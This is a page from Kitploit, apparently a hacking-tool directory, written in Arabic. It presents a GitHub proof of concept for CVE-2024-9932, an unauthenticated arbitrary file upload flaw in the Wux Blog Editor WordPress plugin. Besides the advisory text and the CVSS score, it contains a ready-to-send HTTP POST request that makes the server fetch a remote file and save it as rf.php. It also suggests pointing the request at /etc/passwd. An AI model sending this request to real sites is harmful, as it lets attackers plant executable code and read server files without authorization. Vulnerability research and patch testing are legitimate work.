Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-9932 — Wux Blog Editor <= 3.0.0 - رفع ملفات عشوائي غير مصادق عليه | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-9932
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2024-9932

CVE-2024-9932

Wux Blog Editor <= 3.0.0 - رفع ملفات عشوائي غير مصادق عليه

عرض المستودع
31منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-9932

Wux Blog Editor <= 3.0.0 - رفع ملف تعسفي غير مُوثق

الوصف:

إضافة Wux Blog Editor لووردبريس معرضة لرفع ملفات تعسفية بسبب عدم كفاية التحقق من نوع الملف في دالة 'wuxbt_insertImageNew' في الإصدارات حتى 3.0.0. هذا يمكّن المهاجمين غير المُوثقين من رفع ملفات تعسفية على خادم الموقع المتأثر مما قد يُمكّن من تنفيذ كود عن بُعد.

root@kitploit:~
Link: CVE-2024-9932
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

POC

root@kitploit:~
POST /wp-json/external-post-editor/v2/image-upload HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 165
Origin: http://kubernetes.docker.internal
Connection: keep-alive

{
    "url": "https://rfi.nessus.org/rfi.txt",
    "imageName": "rf.php",
    "image_alt": "Description of the image",
    "image_title": "Title of the image"
}

انتهى الملف في /wp-content/uploads/2024/11/rf.php

يمكنك أيضًا تزويده بموقع ملف مثل /etc/passwd

تنزيل الأداة